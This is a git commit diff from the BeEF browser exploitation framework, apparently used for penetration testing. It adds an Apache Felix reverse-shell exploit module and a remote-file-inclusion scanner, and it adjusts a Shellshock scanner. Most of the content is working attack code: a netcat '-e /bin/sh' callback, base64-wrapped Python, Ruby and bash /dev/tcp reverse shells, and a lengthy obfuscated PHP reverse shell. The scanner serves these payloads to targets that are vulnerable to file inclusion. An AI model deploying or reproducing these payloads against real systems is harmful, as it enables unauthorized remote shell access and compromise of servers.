Merge branch 'master' of github.com:beefproject/beef

modules/exploits/apache_felix_remote_shell/command.js

@@ -0,0 +1,51 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var payload_name = 'reverse_netcat';
+  var timeout = 15;
+  var peer = rhost + ':' + rport;
+
+  cleanup = function() {
+    try {
+      document.body.removeChild(felix_exec_iframe_<%= @command_id %>);
+    } catch(e) {
+      beef.debug("Could not remove iframe: " + e.message);
+    }
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+  payload = function() {
+    var whitespace = '';
+    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
+    var payload = '';
+    switch (payload_name) {
+      default: // "reverse_netcat":
+        payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+    }
+    return payload
+  }
+
+  exploit = function() {
+    var code = payload();
+    beef.debug(peer + " - Sending payload (" + code.length + " bytes)");
+    var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  }
+
+  try {
+    exploit();
+  } catch(e) {
+    beef.debug(peer + " - Exploit failed: " + e.message);
+  }
+
+});

modules/exploits/apache_felix_remote_shell/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_felix_remote_shell:
+            enable: true
+            category: "Exploits"
+            name: "Apache Felix Remote Shell (Reverse Shell)"
+            description: "This module attempts to get a reverse shell on an Apache Felix Remote Shell server using the 'exec' command. The org.eclipse.osgi and org.eclipse.equinox.console bundles must be installed and active."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/apache_felix_remote_shell/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_felix_remote_shell < BeEF::Core::Command
+  
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = "" if lhost == "0.0.0.0"
+    return [
+      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
+      { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6666' },
+      { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
+      { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

modules/exploits/rfi_scanner/command.js

@@ -0,0 +1,73 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  var rproto = '<%= @rproto %>';
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var base_dir = '<%= @base_dir %>';
+  var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+  var target = rproto + '://' + rhost + ':' + rport + base_dir;
+  var wait = '<%= @wait %>';
+
+  get_url = function(uri) {
+    try {
+      var xhr = new XMLHttpRequest();
+      var rfi = uri.replace(/XXpathXX/g, payload_url);
+      xhr.open('GET', target+rfi, true);
+      xhr.onload = function () {
+      };
+      xhr.onreadystatechange = function () {
+        if (xhr.readyState == 4 && xhr.status == 200) {
+          beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+        }
+      }
+      xhr.send(null);
+    } catch (e){
+      beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+    }
+  }
+
+  // add scripts to queue
+  var requests = new Array(
+<%=
+  scripts = []
+  File.open("#{$root_dir}/modules/exploits/rfi_scanner/rfi.txt", 'r') do |file_handle|
+    file_handle.each_line do |line|
+      uri = line.chomp!
+      next if uri =~ /^#/
+      next if uri.nil?
+      next if uri !~ /XXpathXX/
+      scripts << "'#{uri.gsub("'", "\\\\'")}'"
+    end
+  end
+  scripts.shuffle.join(",\n")
+%>
+);
+
+  // process queue
+  beef.debug("[command #<%= @command_id %>] Starting RFI scan of "+target+" ("+requests.length+" URLs)");
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
+  var timeout = wait * requests.length + 10;
+  var handle = setInterval(function() {
+    if (requests.length > 0) {
+      get_url(requests.pop());
+    } else cleanup();
+  }, wait*1000);
+
+  // clean up
+  cleanup = function() {
+    if (handle) {
+      beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
+      clearInterval(handle);
+      handle = 0;
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+    }
+  }
+  setTimeout("cleanup();", timeout*1000);
+
+});

modules/exploits/rfi_scanner/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        rfi_scanner:
+            enable: true
+            category: "Exploits"
+            name: "RFI Scanner"
+            description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.</br><br/>This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/rfi_scanner/module.rb

@@ -0,0 +1,201 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Rfi_scanner < BeEF::Core::Command
+
+	def pre_send
+		lhost = '127.0.0.1'
+		lport = 4444
+		payload = 'reverse_php'
+		@datastore.each do |input|
+			if input['name'] == 'lhost'
+				lhost = input['value']
+			elsif input['name'] == 'lport'
+				lport = input['value']
+			end
+		end
+		@datastore.each do |input|
+			if input['name'] == 'payload'
+				case input['value']
+				when "reverse_python" # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX
+					cmd = Base64.encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);").gsub(/\r?\n/, '')
+					payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"
+				when "reverse_netcat"
+					payload = "`nc #{lhost} #{lport} -e /bin/sh`"
+				when "reverse_ruby" # msfvenom -p cmd/unix/reverse_ruby LHOST=X.X.X.X LPORT=XXXX
+					payload = "`ruby -rsocket -e \"exit if fork;c=TCPSocket.new('#{lhost}','#{lport}');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end\"`"
+				when "reverse_bash"
+					payload = "`bash -c \"/bin/bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1\"`"
+				else # "reverse_php" # msfvenom -p php/reverse_php LHOST=X.X.X.X LPORT=XXXX
+					payload = <<-EOS
+    $ipaddr='#{lhost}';
+    $port=#{lport};
+
+      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
+      $dis=@ini_get('disable_functions');
+      if(!empty($dis)){
+        $dis=preg_replace('/[, ]+/', ',', $dis);
+        $dis=explode(',', $dis);
+        $dis=array_map('trim', $dis);
+      }else{
+        $dis=array();
+      }
+      
+
+    if(!function_exists('zBoGL')){
+      function zBoGL($c){
+        global $dis;
+        
+      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
+        $c=$c." 2>&1\\n";
+      }
+      $eclnc='is_callable';
+      $wGGmd='in_array';
+      
+      if($eclnc('system')and!$wGGmd('system',$dis)){
+        ob_start();
+        system($c);
+        $o=ob_get_contents();
+        ob_end_clean();
+      }else
+      if($eclnc('popen')and!$wGGmd('popen',$dis)){
+        $fp=popen($c,'r');
+        $o=NULL;
+        if(is_resource($fp)){
+          while(!feof($fp)){
+            $o.=fread($fp,1024);
+          }
+        }
+        @pclose($fp);
+      }else
+      if($eclnc('passthru')and!$wGGmd('passthru',$dis)){
+        ob_start();
+        passthru($c);
+        $o=ob_get_contents();
+        ob_end_clean();
+      }else
+      if($eclnc('proc_open')and!$wGGmd('proc_open',$dis)){
+        $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
+        $o=NULL;
+        while(!feof($pipes[1])){
+          $o.=fread($pipes[1],1024);
+        }
+        @proc_close($handle);
+      }else
+      if($eclnc('exec')and!$wGGmd('exec',$dis)){
+        $o=array();
+        exec($c,$o);
+        $o=join(chr(10),$o).chr(10);
+      }else
+      if($eclnc('shell_exec')and!$wGGmd('shell_exec',$dis)){
+        $o=shell_exec($c);
+      }else
+      {
+        $o=0;
+      }
+    
+        return $o;
+      }
+    }
+    $nofuncs='no exec functions';
+    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
+      $s=@fsockopen("tcp://#{lhost}",$port);
+      while($c=fread($s,2048)){
+        $out = '';
+        if(substr($c,0,3) == 'cd '){
+          chdir(substr($c,3,-1));
+        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
+          break;
+        }else{
+          $out=zBoGL(substr($c,0,-1));
+          if($out===false){
+            fwrite($s,$nofuncs);
+            break;
+          }
+        }
+        fwrite($s,$out);
+      }
+      fclose($s);
+    }else{
+      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
+      @socket_connect($s,$ipaddr,$port);
+      @socket_write($s,"socket_create");
+      while($c=@socket_read($s,2048)){
+        $out = '';
+        if(substr($c,0,3) == 'cd '){
+          chdir(substr($c,3,-1));
+        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
+          break;
+        }else{
+          $out=zBoGL(substr($c,0,-1));
+          if($out===false){
+            @socket_write($s,$nofuncs);
+            break;
+          }
+        }
+        @socket_write($s,$out,strlen($out));
+      }
+      @socket_close($s);
+    }
+EOS
+
+				end
+			end
+		end
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/plain'}, "<?php #{payload} ?>", "/rfi_php_#{@command_id}.txt", -1)
+	end
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+                lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+                lhost = "" if lhost == "0.0.0.0"
+		url = "#{proto}://#{lhost}:#{beef_port}"
+		return [
+			{ 'name' => 'rproto',
+				'type' => 'combobox',
+				'ui_label' => 'Target Protocol',
+				'store_type' => 'arraystore',
+				'store_fields' => ['rproto'],
+				'store_data' => [
+					['http'],
+					['https']
+				],
+				'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+				'valueField' => 'rproto',
+				'displayField' => 'rproto',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
+			{ 'name' => 'payload_url', 'ui_label' => 'BeEF server URL',  'value' => url },
+			{ 'name' => 'payload',
+				'type' => 'combobox',
+				'ui_label' => 'Payload',
+				'store_type' => 'arraystore',
+				'store_fields' => ['payload'],
+				'store_data' => [ ['reverse_bash'], ['reverse_netcat'], ['reverse_ruby'], ['reverse_python'], ['reverse_php'] ],
+				'emptyText' => 'Select a payload',
+				'valueField' => 'payload',
+				'displayField' => 'payload',
+				'mode' => 'local',
+				'forceSelection' => 'false',
+				'autoWidth' => true
+			},
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' },
+			{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+		#BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/rfi_php_#{@command_id}.txt")
+	end
+
+end

modules/exploits/rfi_scanner/update-list

@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "[*] Deleting old rfi.txt..."
+rm rfi.txt
+echo "[*] Downloading latest rfi.txt..."
+wget "https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt"

modules/exploits/shell_shock_scanner/command.js

@@ -13,7 +13,6 @@ beef.execute(function() {
   var target = rproto + '://' + rhost + ':' + rport; 
   var method = '<%= @method %>';
   var wait = '<%= @wait %>';
-  var timeout = '<%= @timeout %>';
 
   get_cgi = function(uri) {
     try {
@@ -34,7 +33,8 @@ beef.execute(function() {
     }
   }
 
-  var scripts = new Array(
+  // add scripts to queue
+  var requests = new Array(
 <%=
   scripts = []
   File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
@@ -49,12 +49,10 @@ beef.execute(function() {
 %>
 );
 
-  // add scripts to queue
-  var requests = [];
-  for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
-
   // process queue
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+  beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
+  var timeout = wait * requests.length + 10;
   var handle = setInterval(function() {
     if (requests.length > 0) {
       get_cgi(requests.pop());
@@ -64,7 +62,7 @@ beef.execute(function() {
   // clean up
   cleanup = function() {
     if (handle) {
-      beef.debug("Killing timer [ID: " + handle + "]");
+      beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
       clearInterval(handle);
       handle = 0;
       beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");

modules/exploits/shell_shock_scanner/config.yaml

@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "Shell Shock Scanner (Reverse Shell)"
-            description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
+            description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>.<br/><br/>The scan will take about 2 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
             authors: ["Stephane Chazelas", "mz", "bmantra", "radoen", "bcoles"]
             target:
                 working: ["ALL"]

modules/exploits/shell_shock_scanner/module.rb

@@ -30,8 +30,7 @@ class Shell_shock_scanner < BeEF::Core::Command
 			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
 			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' },
-			{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
-			{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+			{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }
 		]
 	end